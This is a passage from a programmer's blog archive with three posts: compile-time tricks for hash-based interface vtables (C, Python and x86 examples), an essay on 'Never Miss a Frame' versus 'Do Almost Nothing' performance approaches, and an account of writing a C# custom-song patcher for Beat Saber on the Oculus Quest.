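    name: [methods.get(sig) for sig in all_signatures]
    for name, methods in classes.items()
}

def dispatch(class_name, signature):
    # The slot is a constant per signature, so no search is needed.
    return tables[class_name][slot_of[signature]]

# Total space is (number of classes) * (number of signatures),
# and both factors grow with the size of the program.
total_slots = sum(len(table) for table in tables.values())
```

Even in this tiny example two of the six slots are empty, and the wasted share grows as more classes and signatures are added.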

Hash vtables

Instead of using a giant fixed table, we can use a hash table from method signature to method pointer. Since every table doesn’t need to be large enough to fit all method signatures in the entire program, this solves the scaling problem. For simplicity we’ll use linear probing to handle the case when our hash tries to put two methods in the same slot: we put the colliding method in the next available slot.

However this is now much slower than simple tables. A simple hash table lookup with linear probing includes two operations that need to loop over the bytes in the signature as well as a probing loop:

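#include <stddef.h>
#include <stdint.h>
#include <string.h>

typedef struct {
  char *signature; // assume signatures are strings for simplicity
  void *fnAddr;
} TableEntry;

uint32_t hash(const char *str); // any string hash function, defined elsewhere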

void *lookup(TableEntry *table, size_t tableSize, char *query) {
  uint32_t queryHash = hash(query); // <- O(n) in signature length
  // look in the next slot if a collision bumped our target from its place
  for(;;queryHash++) {
    queryHash %= tableSize;
    TableEntry entry = table[queryHash];
    if(strcmp(query, entry.signature) == 0) { // <- O(n) in signature length
      return entry.fnAddr;
    }
  }
}

Why use queryHash %= tableSize instead of just indexing with queryHash % tableSize? I did that in the initial draft of this post, but then I realized it breaks when the initial hash is close to the maximum integer and probing causes queryHash to overflow to zero. That would have been a very evil bug since it would silently give the wrong result but only exceedingly rarely.
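
The lookup relies on the table having been filled with the same probing rule. Here is a minimal build-side sketch in Python, assuming `zlib.crc32` as a stand-in for whatever hash function the compiler uses (the post does not say which) and with made-up function names:

```python
import zlib

def toy_hash(signature):
    # Stand-in 32-bit hash; an assumption, not the compiler's real hash.
    return zlib.crc32(signature.encode())

def build_table(methods, table_size):
    """Place (signature, fn) pairs into a fixed-size table with linear probing."""
    assert len(methods) <= table_size, "table too small for this class"
    table = [None] * table_size
    for signature, fn in methods.items():
        i = toy_hash(signature) % table_size  # home slot
        while table[i] is not None:           # slot taken: try the next one
            i = (i + 1) % table_size
        table[i] = (signature, fn)
    return table

def lookup(table, query):
    size = len(table)
    i = toy_hash(query) % size
    for _ in range(size):  # bounded here, unlike the C loop, to fail cleanly
        entry = table[i]
        if entry is not None and entry[0] == query:
            return entry[1]
        i = (i + 1) % size
    raise KeyError(query)
```

Python integers don't overflow, so the wraparound issue described above doesn't arise here, but the index is still reduced modulo the table size on every probe step.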

Hashing at compile time

First we’ll take advantage of the fact that we know which signatures are going to be used for each method call lookup at compile time, so we can do the hashing at compile time and then just compare the hashes when probing. This way we don’t even need to store the signatures in the table for comparison, just the hashes.

typedef struct {
  uint32_t hash;
  void *fnAddr;
} TableEntry;

void *lookup(TableEntry *table, size_t tableSize, uint32_t queryHash) {
  // probe with a separate index so queryHash stays intact for the comparison
  for(size_t i = queryHash % tableSize;; i = (i + 1) % tableSize) {
    TableEntry entry = table[i];
    if(entry.hash == queryHash) {
      return entry.fnAddr;
    }
  }
}

Now our method lookup is simple enough that we can viably translate it to assembly and insert a version of it at every method call site. In the common case of no probing, branch prediction and out of order execution in modern processors should even make it so the cost over a normal vtable lookup is minimal!

Avoiding collisions with rehashing

The above approach has a problem, which is that we stopped handling hash collisions. A method call could resolve incorrectly if two different signatures hash to the same thing. According to my most frequently referenced Wikipedia page, at 32 bits for our hash we’re not safe from collisions in large programs, even if we use a strong hash function.
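
To put a rough number on that risk, the standard birthday-bound approximation can be sketched in Python. It assumes an ideal hash that spreads signatures uniformly over all 32-bit values, and the function name is made up for illustration:

```python
import math

def collision_probability(num_signatures, hash_bits=32):
    """Approximate chance that any two of n uniformly random hashes collide."""
    pairs = num_signatures * (num_signatures - 1) / 2
    # 1 - exp(-pairs / 2^bits), written with expm1 for accuracy at small values
    return -math.expm1(-pairs / 2**hash_bits)
```

Under that assumption, a program with 10,000 distinct signatures has roughly a 1% chance of at least one collision, and the chance reaches about 50% at around 77,000 signatures.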

My solution to this is to keep a table at compile time of which hash value I’m using for each signature. When I’m adding a new signature to the table I append an additional integer before hashing, and if the resulting value collides with an existing hash, then I increment the integer and hash again until I get a value that doesn’t collide. This ensures that comparing signatures only by hash in the lookup is valid because hashes uniquely identify signatures.
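
A minimal sketch of that rehashing loop in Python, assuming `zlib.crc32` as the hash and a `#` separator before the appended integer (both are illustrative choices, not details from the compiler):

```python
import zlib

def assign_unique_hashes(signatures, hash_fn=zlib.crc32):
    """Give each signature a hash value that no other signature shares."""
    hash_of = {}  # signature -> chosen hash
    used = set()  # hash values already taken
    for sig in signatures:
        if sig in hash_of:
            continue  # already assigned
        salt = 0
        while True:
            h = hash_fn(f"{sig}#{salt}".encode())
            if h not in used:
                break
            salt += 1  # collision: bump the integer and hash again
        used.add(h)
        hash_of[sig] = h
    return hash_of
```

The call sites and the tables both read their hash values from the resulting mapping, so the salt itself never needs to exist at run time.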

Sizing the table ahead of time

In our above examples we need to pass in the table size to our lookup. If each class can have differently sized tables, we also need to store the size somewhere accessible, like index -1 from the vtable pointer. However loading the size means probably loading another cache line in serial, carrying a performance cost. The solution is to make all our hash vtables the same size.

The other problem is that the modulo operation is relatively expensive, having a latency of 20+ cycles. For the initial lookup we can fix this by also doing the modulo at compile time, then moving the modulo to the probing case of the assembly stub. We can improve the probing case as well by making the table size always a power of 2, and then using a bitwise AND with a constant mask (which has 1 cycle of latency).

In our compiler I computed a fixed power-of-2 table size ahead of time by figuring out how many method signatures the largest table needed to store, multiplying by an arbitrary factor of 4 to avoid collisions (and thus probing), then rounding up to a power of 2. I expect the size of classes follows a power law distribution so the largest class would scale with the log of the size of the program, making total table space O(n log n) in program size.
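
The sizing rule and the mask trick can be sketched in a few lines of Python. The figure of 30 methods for the largest class is an assumed value for illustration, and `table_size_for` is a made-up name:

```python
def table_size_for(largest_class_methods, expansion_factor=4):
    """Round largest_class_methods * expansion_factor up to a power of 2."""
    needed = max(1, largest_class_methods * expansion_factor)
    return 1 << (needed - 1).bit_length()

size = table_size_for(30)  # 30 * 4 = 120, rounded up to 128
mask = size - 1            # 127, i.e. 0b1111111

# For a power-of-2 size, masking gives the same result as the modulo.
same = all((i & mask) == (i % size) for i in range(10_000))
```

The equivalence only holds because the size is a power of 2, which is why the rounding step matters as much as the expansion factor.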

Probing only when necessary

My final idea was that when I was building the tables I could track which signature hashes ever collide in a table and get placed in a slot other than their home slot, and thus may need probing. Then for all the signatures which never got placed outside their home slot, I could just not generate the probing code at those call sites! Non-probing sites also don’t need to check that the hash is equal (it always will be) and can do the modulo at compile time, making them just indexing a table.

The final probing and non-probing assembly method call stubs look something like this:

; == X86 Assembly for general case with probing, call target in eax
mov eax, [eax] ; eax = address of object -> eax = address of vtable
mov ebx, 61 ; the initial slot index, hash % size
.callcmp:
mov ecx, [eax + ebx*8] ; get the hash at the current slot
cmp ecx, 1062035773 ; check if it matches the expected hash
je .docall ; jump if it did match
add ebx, 1 ; if not probe to the next bucket
and ebx, 127 ; bit mask for computing i % 128 (the table size)
jmp .callcmp ; check the hash again
.docall:
call [eax + ebx*8 + 4] ; indirect call to the function pointer


; == X86 Assembly for case without probing, call target in eax
mov eax, [eax] ; eax = address of object -> eax = address of vtable
call [eax + 492] ; indirect call to the function at offset (hash%size)*8+4
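
One way the bookkeeping that picks between these two stubs could look, sketched in Python rather than taken from the compiler (the function names and sample hash values are made up for illustration):

```python
def build_and_classify(hashes, table_size):
    """Fill one class's table; return it plus the hashes not in their home slot."""
    assert len(hashes) <= table_size
    table = [None] * table_size
    displaced = set()
    for h in hashes:
        home = h % table_size
        i = home
        while table[i] is not None:  # linear probing on collision
            i = (i + 1) % table_size
        table[i] = h
        if i != home:
            displaced.add(h)
    return table, displaced

def hashes_needing_probing(class_hashes, table_size):
    """Union of displaced hashes over every class's table."""
    needs = set()
    for hashes in class_hashes.values():
        _, displaced = build_and_classify(hashes, table_size)
        needs |= displaced
    return needs
```

A call site whose signature hash is in the returned set gets the probing stub, and every other call site gets the two-instruction version.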

Our arbitrary max table size expansion factor of 4 led to only 0.13% of method call sites in our test program corpus needing probing, although larger programs would be less forgiving. This meant that in almost all cases my hash vtables emitted basically the same code as classic vtables would, except that the same vtables also worked for interfaces! However the tables being larger than classic vtables in the non-interface case means they’ll be less efficient with cache space and so would be somewhat slower in practice.

Conclusion

I’ve never heard of anyone implementing interface vtables in this way, but I wouldn’t be surprised if there is prior art because these are all just simple insights you can have by thinking about how to specialize a hash table for this problem. I think LuaJIT does some similar tricks for its hash tables where its tracing JIT can specialize on the hash value and optimize an index lookup plus bailing from the trace if the key doesn’t match.

According to my compilers class professor there’s a broad literature of optimizing the “giant table with all signatures” approach with heuristics for saving space by rearranging and merging the tables of different classes into the same space or re-using offsets across classes to make tables smaller. But the general problem is NP-complete so can only be solved heuristically. Interestingly I ended up with a kind of similar direction which re-uses offsets effectively randomly, but then includes a mechanism for handling the resulting collisions.

I hope you found some of these hash table tricks fun and came away inspired to think about how you might be able to modify a common data structure to fit your application better!

Two Performance Aesthetics: Never Miss a Frame and Do Almost Nothing

2019-07-27T00:00:00+00:00

I’ve noticed when I think about performance nowadays that I think in terms of two different aesthetics. One aesthetic, which I’ll call Never Miss a Frame, comes from the world of game development and is focused on writing code that has good worst case performance by making good use of the hardware. The other aesthetic, which I’ll call Do Almost Nothing comes from a more academic world and is focused on algorithmically minimizing the work that needs to be done to the extent that there’s barely any work left, paying attention to the performance at all scales. In this post I’ll describe the two aesthetics, look at some case studies of pairs of programs in different domains that follow different aesthetics, and talk about the trade-offs involved and how to choose which direction to lean for a project.

Never Miss a Frame

In game development the most important performance criterion is that your game doesn’t miss frame deadlines. You have a target frame rate and if you miss the deadline for the screen to draw a new frame your users will notice the jank. This leads to focusing on the worst case scenario and often having fixed maximum limits for various quantities. This property can also be important in areas other than game development, like other graphical applications, real-time audio, safety-critical systems and many embedded systems. A similar dynamic occurs in distributed systems where one server needs to query 100 others and combine the results: you’ll wait for the slowest of the 100 every time so speeding up some of them doesn’t make the query faster, and queries occasionally taking longer (e.g. because of garbage collection) will impact almost every request!
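
The fan-out effect is easy to check with a little arithmetic. This Python sketch assumes each backend is slow independently with the same probability, and the 1% and 5% rates are made-up figures:

```python
def chance_any_slow(num_servers, p_slow):
    """Probability that at least one of num_servers independent calls is slow."""
    return 1 - (1 - p_slow) ** num_servers

one_percent = chance_any_slow(100, 0.01)   # roughly 0.63
five_percent = chance_any_slow(100, 0.05)  # above 0.99
```

So under these assumptions a pause that hits only 1 in 100 calls on each backend still delays well over half of the fanned-out queries.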

A consequence of deadlines is that it’s not worth saving time unless you can save it in all cases. Things like caching often don’t help because if the item isn’t in the cache then you’ll miss your deadline. The easiest way to achieve this is to just do all the work every single frame and not keep anything between frames except for persistent state.

In this kind of domain you’ll often run into situations where in the worst case you can’t avoid processing a huge number of things. This means you need to focus your effort on making the best use of the hardware by writing code at a low level and paying attention to properties like cache size and memory bandwidth.

Projects with inviolable deadlines need to adjust different factors than speed if the code runs too slow. For example a game might decrease the size of a level or use a more efficient but less pretty rendering technique.

Aesthetically: Data should be tightly packed, fixed size, and linear. Transcoding data to and from different formats is wasteful. Strings and their variable lengths and inefficient operations must be avoided. Only use tools that allow you to work at a low level, even if they’re annoying, because that’s the only way you can avoid piles of fixed costs making everything slow. Understand the machine and what your code does to it.

Personally I identify this aesthetic most with Jonathan Blow. He has a very strong personality and I’ve watched enough videos of him that I find imagining “What would Jonathan Blow say?” a good way to tap into this aesthetic. My favourite articles about designs following this aesthetic are on the Our Machinery Blog.

Do Almost Nothing

Sometimes, it’s important to be as fast as you can in all cases and not just orient around one deadline. The most common case is when you simply have to do something that’s going to take an amount of time noticeable to a human, and if you can make that time shorter in some situations that’s great. Alternatively each operation could be fast but you may run a server that runs tons of them and you’ll save on server costs if you can decrease the load of some requests. Another important case is when you care about power use, for example your text editor not rapidly draining a laptop’s battery. In this case you want to do the least work you possibly can.

A key technique for this approach is to never recompute something from scratch when it’s possible to re-use or patch an old result. This often involves caching: keeping a store of recent results in case the same computation is requested again.

The ultimate realization of this aesthetic is for the entire system to deal only in differences between the new state and the previous state, updating data structures with only the newly needed data and discarding data that’s no longer needed. This way each part of the system does almost no work because ideally the difference from the previous state is very small.
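
A toy Python illustration of dealing only in differences: a total that is patched on each edit instead of being recomputed. The `RunningTotal` class is made up for this example and is far simpler than the data structures a real incremental system needs:

```python
class RunningTotal:
    """Keeps sum(values) current by applying only the change from each edit."""

    def __init__(self, values):
        self.values = list(values)
        self.total = sum(self.values)  # the full O(n) pass happens once

    def update(self, index, new_value):
        # Apply the difference instead of re-summing everything: O(1) per edit.
        self.total += new_value - self.values[index]
        self.values[index] = new_value
```

The cost is extra state that has to be kept consistent, which is the kind of complexity the other aesthetic avoids by recomputing everything each frame.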

Aesthetically: Data must be in whatever structure scales best for the way it is accessed, lots of trees and hash maps. Computations are graphs of inputs and results so we can use all our favourite graph algorithms to optimize them! Designing optimal systems is hard so you should use whatever tools you can to make it easier, any fixed cost they incur will be made negligible when you optimize away all the work they need to do.

Personally I identify this aesthetic most with my friend Raph Levien and his articles about the design of the Xi text editor, although Raph also appreciates the other aesthetic and taps into it himself sometimes.

The Tradeoff

Ideally it would be possible to follow both of these ideals simultaneously, writing code that does the minimal amount of work as fast as the machine can possibly perform it. In some cases this is possible but in most cases developers have more important things to do, or there’s a trade-off like caching slowing down the worst case. I’m conflating the axes of deadline-oriented vs time-oriented and low-level vs algorithmic optimization, but part of my point is that while they are different, I think these axes are highly correlated.

In practice when I see people set out to make a fast piece of software, depending on the project’s goals and their background, they tend to lean towards one aesthetic or the other. If every operation in your software never lags, then there’s often no reason to save additional work. If you’ve made everything in your system incremental to the point where everything is doing minimal work, there’s little reason to optimize the operations at a low level since they take negligible time.

That isn’t to say that people trying to make fast software shouldn’t understand both approaches. You don’t want to ignore either the constant factors and the size of N in practice, or the overall scaling and the quality of the algorithms you’re using. For each task you may use mostly one approach or the other, but choosing the approach based on the task rather than always using only one or the other is a valuable skill.

Case Studies

GUI Toolkits

In the olden days, GUIs were rendered with slow CPUs that couldn’t quite render an entire screen’s UI in one frame. This necessitated a Do Almost Nothing approach to GUI toolkits, where they kept track of the current state of the UI along with all sorts of saved computations like layout. Events would try to plumb minimal updates through the whole pipeline, touching as little as possible and then redrawing only the rectangle on the screen that actually needed to be updated, like the single new character you typed. But some updates like opening a new window wouldn’t be able to take advantage of this and might take multiple frames. This design is called “retained mode GUI” and is still around today in most GUI toolkits (with some extensions to use the GPU for scrolling and drawing). It’s still around because it works, it’s what people know, and it ended up good for battery life once laptops and smartphones arrived.

However, at some point computers and GPUs became powerful enough that it was possible to render an entire screen full of UI from scratch every frame. This spawned an alternative approach called “immediate mode GUI” or “imgui” where instead of creating persistent widgets that stick around and can cache computations, you just call functions that figure out how a widget should look and then write data to buffers for the GPU. This is super fast and will always render in one frame provided you don’t render an absurd amount of UI. However, since it’s harder for imgui libraries to cache things, they can’t easily do some things that retained mode UIs can do, like render a long document of internationalized text scrolled to the bottom. All existing internationalized text shaping libraries are too slow to shape a long document in one frame, so immediate mode GUI libraries usually just don’t support internationalized text.

Text Editors

Sublime Text is a text editor that mostly follows the Never Miss a Frame approach. Basically every operation is instant because all the operations have been implemented very efficiently. However, some things like syntax highlighting don’t quite run fast enough to be instant at large file sizes so Sublime does have infrastructure for caching highlighting, and sometimes throws up progress bars when opening large files. Sublime makes trade-offs to use simple but efficient data structures by sacrificing performance in rare cases like editing extremely long lines. This architecture doesn’t always deal well with external code that isn’t designed to be instant though: plugins that communicate with slow compilers can sometimes temporarily hang the editor.

The Xi Editor is designed to solve this problem by being designed from the ground up to grapple with the fact that some operations, especially those interacting with slow compilers written by other people, can’t be made instantaneous. It does this using a fancy asynchronous plugin model and lots of fancy data structures. It tries to allow a native frontend for each platform despite the slowness of cross-language communication over JSON by only ever plumbing minimal deltas over the pipe, so the slowness doesn’t matter. It uses a fancy tree-based rope data structure to make even editing very long lines efficient. Many parts of this worked great, and Xi is extremely fast in many ways. The issue facing the Xi project today is that designing complex data structures and protocols to make every single operation incremental and asynchronous makes progress very slow.

An editor that leans into the Never Miss a Frame aesthetic even harder than Sublime Text is Makepad. It’s a work-in-progress editor that uses an imgui-esque custom UI toolkit to render everything, making heavy use of the GPU. Layout and highlighting for the entire file is calculated every single frame by highly optimized code. This will drop frames on rare 10k line files, but for all other files allows fancy things other editors couldn’t easily do like pressing alt to smoothly animate into an overlay of the functions in the whole file.

Compilers

Jonathan Blow’s Jai compiler is clearly designed with the Never Miss a Frame aesthetic. It’s written to be extremely fast at every level, and the language doesn’t have any features that necessarily lead to slow compiles. The LLVM backend wasn’t fast enough to hit his performance goals so he wrote an alternative backend that directly writes x86 code to a buffer without doing any optimizations. Jai compiles something like 100,000 lines of code per second. Designing both the language and compiler to not do anything slow led to clean build performance 10-100x faster than other commonly-used compilers. Jai is so fast that its clean builds are faster than most compilers’ incremental builds on common project sizes, due to limitations in how incremental the other compilers are.

However, Jai’s compiler is still O(n) in the codebase size where incremental compilers can be O(n) in the size of the change. Some compilers like the work-in-progress rust-analyzer and I think also Roslyn for C# take a different approach and focus incredibly hard on making everything fully incremental. For small changes (the common case) this can let them beat Jai and respond in milliseconds on arbitrarily large projects, even if they’re slower on clean builds.

Conclusion

I find both of these aesthetics appealing, but I also think there’s real trade-offs that incentivize leaning one way or the other for a given project. I think people having different performance aesthetics, often because one aesthetic really is better suited for their domain, is the source of a lot of online arguments about making fast systems. The different aesthetics also require different bases of knowledge to pursue, like knowledge of data-oriented programming in C++ vs knowledge of abstractions for incrementality like Adapton, so different people may find that one approach seems way easier and better for them than the other.

I try to choose how to dedicate my effort to pursuing each aesthetic on a per-project basis by trying to predict how effort in each direction would help. For some projects I know that if I code them efficiently they will always hit the performance deadline, for others I know a way to drastically cut down on work by investing time in algorithmic design, and some projects need a mix of both. Personally I find it helpful to think of different programmers where I have a good sense of their aesthetic and ask myself how they’d solve the problem. One reason I like Rust is that it can do both low-level optimization and also has a good ecosystem and type system for algorithmic optimization, so I can more easily mix approaches in one project. In the end the best approach to follow depends not only on the task, but your skills or the skills of the team working on it, as well as how much time you have to work towards an ambitious design that may take longer for a better result.

Writing a Beat Saber Patcher for the Oculus Quest

2019-07-26T00:00:00+00:00

After trying out VR and Beat Saber at Ctrl-V and really enjoying it, I decided to pre-order an Oculus Quest, the first standalone VR headset with 6 DOF head and hand tracking. As expected I really enjoyed playing Beat Saber and practicing to play more difficult songs, but I also ended up getting wrapped up in the Beat Saber modding community and developing a patcher for adding custom songs which has been downloaded 80,000 times. I figured out how to read and modify the Unity asset file format used by Beat Saber, learned C#, and wrote a patcher that could read in the game’s assets, modify them to add custom songs, and modify the APK in-place with the replaced asset files.

Early Discoveries

I started off by joining the Beat Saber Modding Group Discord chat while my Quest was still shipping, and chatting with the other modders who were eager to figure out how to add custom songs to Beat Saber on the Quest like they have with the PC version. I didn’t have anything to poke at myself yet but I could still chime in with ideas, and I created a Google Doc where I collated and documented other people’s discoveries, which I encouraged other people to edit and write things in as they experimented.

Over a couple days we figured out that Beat Saber was compiled with IL2CPP so modding the C# code would be tricky, but while the levels were stored in a different format than the PC game, they were stored in the Unity asset bundles present in the APK. Some people who had Unity modding tools installed that could read and modify Unity asset files looked at the assets and found the levels but the beat maps looked like indecipherable compressed or encrypted data, then through some digging in disassembly and deduction emulamer figured out that it was the same data types the PC version used for levels, just encoded with C#’s BinaryFormatter and then run through a DeflateStream.
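
For readers who want to poke at similar data outside of C#, the compression layer can be handled with Python’s standard library. This is a minimal sketch assuming the stream is raw DEFLATE with no zlib or gzip header, which is what .NET’s DeflateStream writes. The helper names are made up, and the BinaryFormatter payload inside would still need separate decoding:

```python
import zlib

def inflate_raw(data: bytes) -> bytes:
    # wbits=-15 selects a raw DEFLATE stream with no zlib/gzip header.
    return zlib.decompress(data, wbits=-15)

def deflate_raw(data: bytes) -> bytes:
    compressor = zlib.compressobj(wbits=-15)
    return compressor.compress(data) + compressor.flush()

# Round trip on placeholder bytes (not real beat map data).
payload = b"placeholder beat map bytes " * 50
restored = inflate_raw(deflate_raw(payload))
```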

With this information emulamer could convert PC beatmaps (maps of the patterns of blocks to slash along with the song) to the format that went inside the Unity asset. This could then be patched into an APK using a Unity modding tool like DevX. However, we had noticed that levels contained a signature field so we suspected this wouldn’t work on its own and it didn’t, but it turned out the demo version didn’t check the signature and this led to the first successful test. We still needed to patch the signature check in the full version though, so I tried poking around in Binary Ninja but couldn’t get anywhere because the library with all the code didn’t have symbols for the function names in it. However people on Windows were able to use tools like Il2CppDumper to get symbols, and emulamer found the signature check and figured out an ARM machine code patch to replace the call to the verify signature function with a constant true. Elliot Tate used DevX and this knowledge to perform the first successful patch of the full game.

Figuring Out the Format

So we knew how to patch in custom songs. The problem was we only knew how to do it with closed-source Windows GUI applications like DevX, which wasn’t going to help us deliver custom songs to lots of people, and as a macOS user it wasn’t going to help me. We needed to figure out how to patch Unity assets ourselves. So I did some Googling and while I didn’t find any open source code that could modify Unity assets, I did find code that could read them. Now I just needed to extract an understanding of the asset file format from that code so I could write my own code that could both read and modify them.

I had heard about Kaitai Struct, which lets you write descriptions of a binary format and it will parse it into a tree in a nice IDE for you, but when I tried it I found the IDE really slow, cumbersome and kinda broken. The format was also very declarative and verbose and I found it hard to use. So I considered buying Synalyze It, which is a native macOS hex editor with similar capabilities, but its specification system seemed just as limited. Then (for some reason I forget) I realized that my version of Hex Fiend was many years old, and went looking for a newer version, which I found on their GitHub. In the changelog I saw that they had very recently added support for Binary Templates, which used Tcl (a fully featured programming language!). This was exactly what I was looking for!

So I gradually put together a Hex Fiend template for Unity assets by figuring out open source asset loading code and adding more fields, debugging by reloading the template in Hex Fiend and checking the parse in the tree view to see that the values made sense. Eventually I figured out all the parts of the file necessary to mod in custom levels. The Hex Fiend template was invaluable for making it really easy to write a quick parser and debug my understanding against the real files. It was also valuable later on when I could look at the output of my patcher in a pretty tree view.

I also needed to figure out how the audio files referenced by the audio assets were included. I was originally worried it would be complex because the built-in songs were packed into concatenated resources in the proprietary FSB5 format that I thought I might need to reverse-engineer. However upon further testing it turned out we could just drop .ogg files in the APK and reference them as offset 0 in a resource pack, and Unity could load them.

Writing a Patcher

Now I needed to write a patcher program that could take a Beat Saber APK and some custom songs in the PC JSON format, and produce an APK with the custom songs. I decided to use C# even though I had never used it before, because then I wouldn’t need to reverse-engineer the BinaryFormatter format used for the beatmap conversion, and it’s a nice enough language that works cross-platform. I also decided to structure my patcher as a library so it could be theoretically used in multiple different front ends, possibly including a C#-based GUI, as well as a command line tool and unit tests.

I started by writing a parser for the asset file format that parsed it into C# classes, but classes with a structure carefully designed so that they preserved all the information necessary to recreate the file exactly, while being straightforward to modify. This involved combining the separate directory and contents of the file format into a unified list of assets with no offsets, and ensuring that I saved amounts of padding in fields in relevant objects. Then I wrote the functions to write those classes back out to an assets file. I used a unit test to check that I could parse and then write out an assets file to a byte-identical one with no errors, starting with a small file and fixing bugs until I could round-trip the main assets file with all the levels.
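The shape of that round-trip design can be sketched in a few lines of Python. The file layout here is a toy made up for illustration (a count, a directory of offset/size pairs, then padded data), not the real Unity asset format, and all the names are hypothetical. The point is only that storing padding instead of offsets gives an in-memory form that is easy to edit and still writes back byte-for-byte.

```python
import struct
from dataclasses import dataclass

@dataclass
class Asset:
    padding: int   # zero bytes that preceded this asset's data in the file
    data: bytes

def parse(blob: bytes) -> list:
    (count,) = struct.unpack_from("<I", blob, 0)
    data_start = 4 + 8 * count           # the data region follows the directory
    assets, cursor = [], data_start
    for i in range(count):
        offset, size = struct.unpack_from("<II", blob, 4 + 8 * i)
        start = data_start + offset
        # Keep the gap rather than the offset, so edits can't leave stale offsets.
        assets.append(Asset(padding=start - cursor, data=blob[start:start + size]))
        cursor = start + size
    return assets

def write(assets: list) -> bytes:
    directory, body = b"", b""
    for asset in assets:
        body += b"\0" * asset.padding
        directory += struct.pack("<II", len(body), len(asset.data))  # recomputed offset
        body += asset.data
    return struct.pack("<I", len(assets)) + directory + body

# A hand-built file: two assets, the second aligned to 4 bytes with one pad byte.
original = struct.pack("<IIIII", 2, 0, 3, 4, 5) + b"abc\0defgh"
assert write(parse(original)) == original   # the byte-identical round trip
```

Once the round trip holds, modifying a level is just editing the list and calling `write`, with every offset recomputed for free. This toy ignores trailing bytes after the last asset, which a real format might need to preserve too.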

After that worked I implemented loading the JSON level files and modifying my assets file data structure to insert the new levels into the existing “Extras” level pack. I also needed to copy the audio files into the APK and patch the binary to disable the level signature check. I needed to modify the APK file, but I didn’t want to use the normal method of unzipping it (APKs are just zip files) into a temporary location and then zipping it back up, so I used the standard library ZipArchive functionality which allowed me to modify the Zip file in-place.

After I got all this working and tested I just needed to write a small command line tool using the library I had written. This allowed me to patch my own Beat Saber for the first time and play my first custom level on my own Oculus Quest!

The Competition

All this time, emulamer had also been working on his own patcher with a similar approach to mine. He was making faster progress than me, and patched in his first songs somewhat before I did, and by the time I patched in my first songs his patcher had already been packaged into a Windows GUI by someone else and people were using it. It also supported things mine didn’t yet like cover art and a separate “Custom Levels” pack instead of just putting things in the existing “Extras” pack.

I persisted though because I was having fun and my patcher had some differentiating factors that I imagined could make it competitive with more work:

Emulamer’s code was by his own admission very hacky and he was just trying to get it to work as fast as possible and fix it up later.
Many parts of his patching process were controlled by a batch file and it didn’t work in-place on the APK like mine.
His patcher wasn’t structured as a library and it would be a bunch of refactoring to make it present anything other than one command-line interface.
I had been using DotNet Core on macOS from the start so I knew my patcher should work cross-platform, whereas his wasn’t designed to work on other platforms.

So I set out to add more functionality to my patcher to compete!

Catching Up

The first thing I did is add support for song cover art. I knew that emulamer’s cover art gave the game frame rate issues, which he assumed was because he didn’t resize textures and use texture compression. But when I looked at how the covers from the base game were stored, I noticed they didn’t use any compression but they did use mipmaps, and lack of mipmaps definitely seemed like it could explain the lag. Looking at the cover data in my hex editor I noticed a repeating pattern that got higher-frequency further into the cover, so I guessed that it was probably raw RGB data for all the mip levels concatenated together. I checked what my guess would predict the file size would be against the actual file size and it matched exactly. So I added support for covers with concatenated mipmaps of the size from the base game using ImageSharp. I let emulamer know about the mipmapping so he could reference the code and fix his frame rate issues.
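That size check is easy to reproduce. A minimal sketch, assuming a square cover stored as 3 bytes per pixel with every mip level halving down to 1x1. The 256x256 size is just an example value, not necessarily the game's actual cover size:

```python
def mip_chain_bytes(size: int, bytes_per_pixel: int = 3) -> int:
    """Total bytes for a square texture plus every mip level down to 1x1."""
    total = 0
    while size >= 1:
        total += size * size * bytes_per_pixel
        size //= 2          # each mip level halves the width and height
    return total

print(mip_chain_bytes(256))  # 262143
```

If the number a formula like this predicts matches the size of the blob in the file exactly, that is strong evidence for the "raw pixels, all mip levels concatenated" guess.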

Then I noticed a developer of SideQuest (a popular Electron GUI for side-loading apps onto the Oculus Quest) mentioning in the Discord that he was working on adding Beat Saber custom song support to SideQuest. I used the power of my patcher being a library to throw together a separate command line binary that used a JSON interface over stdin/stdout to provide an easy programmatic interface with more control. Then I included it in the cross-platform CI builds that raftario contributed, which used DotNet core’s ability to build a self-contained folder that includes the C# runtime and compiled program IL. I chatted with the SideQuest developer and pitched him on using my patcher because of the convenient cross-platform binaries with a uniform easy interface that could patch in-place.

The last major remaining obstacle to an easy cross-platform patcher was that after patching the APK needed to be signed using a Java-based JAR signer, requiring users to have 64-bit Java installed. Emulamer and I chatted about this and decided it seemed feasible to write a signer in C#, which he managed to do fairly quickly and let me use his code, and in turn I figured out how to speed up the signing by a lot and let him know how to improve the speed in his own patcher.

Soon my patcher was incorporated in a SideQuest release that people could use to (somewhat) easily patch custom songs into their Beat Saber!

Finishing Touches

At this point sc2ad had started working on my codebase and adding support for custom saber colors, removing songs, and custom packs. His code was still experimental, but I worked with him and did a lot of refactoring myself to integrate his code with how I wanted my patcher to work and eventually merged all of his work into master. As part of this process I wrote a new JSON-based command line with a new interface that allowed creating unlimited custom packs and organizing and ordering songs within them. The new code would then take an APK and synchronize the state with the songs you requested: adding, removing and rearranging the minimal amount necessary to update the APK quickly.
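The synchronization idea can be sketched as a small diff between what is installed and what was requested. This is a hypothetical illustration for a single pack, with made-up names, not the logic my patcher actually uses:

```python
def plan_sync(installed, requested):
    """Return (to_remove, to_add, needs_reorder) to turn installed into requested."""
    installed_set, requested_set = set(installed), set(requested)
    to_remove = [song for song in installed if song not in requested_set]
    to_add = [song for song in requested if song not in installed_set]
    # Songs present in both lists only need touching if their relative order changed.
    kept_before = [song for song in installed if song in requested_set]
    kept_after = [song for song in requested if song in installed_set]
    return to_remove, to_add, kept_before != kept_after

print(plan_sync(["a", "b", "c"], ["c", "a", "d"]))  # (['b'], ['d'], True)
```

Songs that appear in both lists never get re-copied, which is where the time saving over rebuilding the whole APK comes from.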

I let the SideQuest developer I talked to know these capabilities were coming and the SideQuest team developed an awesome interface for organizing your songs into custom playlists and synchronizing them. Soon the new version of my patcher was integrated into SideQuest and released to the world.

I had been scaling down the amount of time I spent working on Beat Saber patching, but as Beat Saber released updated versions I continued to update my patcher to be compatible with the new versions and improve its reliability. One of the Beat Saber updates removed the BinaryFormatter-based beatmaps and switched to just JSON strings in the same format as the PC version with no signatures, which meant that eventually there was no reason my patcher needed to be in C# instead of my preferred Rust, but I had already written thousands of lines of code so there was no point in switching.

Eventually things were working smoothly enough and I announced my intent to retire from Beat Saber patching and work on other things. SideQuest continued to be used by tons of people, with my patcher (downloaded automatically when people tried to use the SideQuest Beat Saber functionality) racking up 80,000 downloads.

The Next Chapter

